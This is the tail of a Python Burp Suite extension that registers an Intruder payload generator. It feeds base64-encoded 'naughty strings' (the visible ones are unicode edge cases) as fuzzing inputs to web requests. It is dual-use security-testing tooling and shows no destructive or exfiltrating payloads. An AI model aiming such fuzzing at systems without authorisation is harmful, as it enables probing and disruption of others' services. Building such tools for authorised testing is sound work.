    "zaByzLzMnsy7zK3Ml2XMusygzKPNn3PMmM2HzLPNjcydzYllzYnMpcyvzJ7Mss2azKzNnMe5zKzN",
    "zqniiYjDp+KImuKIq8ucwrXiiaTiiaXDtw==",
]

for stringb64 in naughtlyStrings:
    PAYLOADS.append(bytearray(stringb64))


class BurpExtender(
    IBurpExtender, IIntruderPayloadGeneratorFactory, IIntruderPayloadProcessor
):
    #
    # implement IBurpExtender
    #

    def registerExtenderCallbacks(self, callbacks):
        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()

        # set our extension name
        callbacks.setExtensionName("Naughtly Strings B64 Intruder")

        # register ourselves as an Intruder payload generator
        callbacks.registerIntruderPayloadGeneratorFactory(self)

    #
    # implement IIntruderPayloadGeneratorFactory
    #

    def getGeneratorName(self):
        return "Naughtly Strings B64"

    def createNewInstance(self, attack):
        # return a new IIntruderPayloadGenerator to generate payloads for this attack
        return IntruderPayloadGenerator()


#
# class to generate payloads from a simple list
#


class IntruderPayloadGenerator(IIntruderPayloadGenerator):
    def __init__(self):
        self._payloadIndex = 0

    def hasMorePayloads(self):
        return self._payloadIndex < len(PAYLOADS)

    def getNextPayload(self, baseValue):
        payload = PAYLOADS[self._payloadIndex]
        self._payloadIndex = self._payloadIndex + 1

        return payload

    def reset(self):
        self._payloadIndex = 0
